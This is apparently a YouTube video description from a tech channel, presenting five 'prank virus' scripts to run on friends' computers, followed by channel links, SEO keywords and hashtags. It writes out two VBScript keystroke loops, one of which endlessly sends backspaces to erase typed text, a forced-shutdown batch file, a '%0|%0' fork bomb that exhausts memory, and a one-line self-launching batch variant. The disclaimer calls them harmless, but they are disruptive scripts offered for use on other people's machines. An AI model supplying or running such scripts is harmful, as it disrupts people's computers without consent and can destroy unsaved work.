💻 5 Simple Virus Programs to Prank Your Friends | Easy Tutorial 💻
Ready to have some harmless fun with your friends? In this step-by-step tutorial, I’ll show you how to create 5 easy-to-make virus programs that you can use to prank your friends. These programs are just for fun and educational purposes only no real harm intended!
╔═╦╗╔╦╗╔═╦═╦╦╦╦╗╔═╗
║╚╣║║║╚╣╚╣╔╣╔╣║╚╣═╣
╠╗║╚╝║║╠╗║╚╣║║║║║═╣
╚═╩══╩═╩═╩═╩╝╚╩═╩═╝
Here’s what we’ll cover:
1️⃣ Auto Deleting Virus: Makes the backspace key delete everything typed.
MsgBox "You are hacked!"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
2️⃣ Infinite Typing Virus: Automatically types a word or phrase endlessly.
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are hacked!"
loop
3️⃣ Shutdown Virus: Instantly shuts down the computer with one click.
@echo off
shutdown -c "ERROR!" -s
4️⃣ System Crasher 1.0: Also known as a fork bomb, it overloads the RAM with infinite CMD windows.
%0|%0
5️⃣ System Crasher 2.0: Another version of the fork bomb, designed for ultimate pranks.
start game.bat
⚠️ Disclaimer: These programs are for fun and educational purposes only. Use them responsibly and with permission from others.
🎯 Why Try These Virus Programs?
Learn how basic scripts work.
Test your programming and debugging skills.
Share some laughs with harmless pranks.
🛠️ Tools You’ll Need:
Notepad or any text editor.
A curious mind!
📌 Don’t Forget: Like, share, and subscribe to stay updated with more amazing tech tutorials and tips!
⌚ TIMESTAMPS
0:00 - Intro
0:23 - 1.Auto Deleting Virus
2:08 - 2.Infinite Typing Virus
3:43 - 3.Shutdown Virus
4:42 - 4.System Crasher 1.0
5:25 - 5.System Crasher 2.0
6:59 - The End
👉 CHECK OUT OUR OTHER VIDEOS
💻 How to Autorun any File Instantly When the USB is Inserted! | Easy Tutorial 2024 : • How to Autorun any File Instantly Whe...
💻 Akira 120 FPS Edit on TikTok | Flowframes Tutorial 2024 : • Akira 120 FPS Edit on TikTok | Flowfr...
💻 Transform Your PC with Live Zombies🧟(easy setup 2024) : • Transform Your PC with Live Zombies🧟(...
💻 Edit Your Profile Picture Like a PRO : • Edit Your Profile Picture Like a PRO
💻 Protect Your Folders Using Password on Windows 11/10 Without Installing Any Software : • Protect Your Folders Using Password o...
👉 ABOUT OUR CHANNEL
Our channel is about Technology. We cover lots of cool stuff such as New technologies like AI, PC tips and tricks and Mobile hacks
Check out our channel here:
/ @theuniversityguy
Don’t forget to subscribe!
👉 FIND US AT
https://linktr.ee/theuniversityguy
👉 GET IN TOUCH
Contact us on [email protected]
👉 FOLLOW US ON SOCIAL
Get updates or reach out to Get updates on our Social Media Profiles!
TikTok: / the.university.guy
Instagram: / the.university.guy
WhatsApp: https://whatsapp.com/channel/0029Vaes...
Telegram: https://t.me/+8qA0K2aGeRQwNzQ9
🟢 SEO Keywords:
virus program tutorial, prank virus programs, create a harmless virus, fork bomb tutorial, infinite typing script, auto delete virus, shutdown virus prank, fun cmd pranks, basic virus scripts, educational pranks, system crash prank, cmd hacks, tech fun, prank your friends PC, harmless virus guide, prank virus tutorial, harmless virus scripts, CMD pranks and hacks, auto delete prank virus, infinite loop scripts, system crash prank virus, shutdown PC virus, create cmd fork bomb, fun PC pranks tutorial, coding for pranks beginners
🟣 Hashtags:
#viruspranks #virus #notepadtricks #forkbomb #CMDHacks #FunTechTutorials #PrankScripts #SystemCrasher #ForkBomb #ShutdownVirus #InfiniteTyping #AutoDeleteVirus #techtutorial #pcpranks #EducationalCoding #programmingfun #harmlessvirus #VirusPrograms #HarmlessPranks #codingforbeginners #cmdtricks #PCPranks2024 #techfun #programmingtutorial #creativecoding #PCVirusPranks #ScriptTutorials #LearnCodingFun #commandprompthacks #BasicVirusCreation #TechTricks2024 #HackingForFun #SafeVirusScripts #KeyboardPranks #PCPranksIdeas
🔵 SEO Tags:
virus programs, harmless virus tutorial, prank virus scripts, cmd virus creation, auto deleting virus, infinite typing virus, shutdown PC prank, fork bomb virus, system crasher prank, tech tutorials, programming tricks, cmd hacks, how to create viruses, fun coding projects, harmless tech pranks, prank your friends' PC, easy virus coding tutorial, PC tricks for fun, virus program tutorial, prank virus programs, cmd hacks for fun, create harmless viruses, basic coding pranks, infinite typing script, shutdown virus prank, system crash prank, fork bomb explained, harmless cmd scripts, PC pranks ideas, PC crash tricks, fun tech tutorials, prank your friends' computer, auto delete virus script, infinite loop coding, system overload prank, simple virus scripts, educational tech pranks, harmless fun virus creation
Информация по комментариям в разработке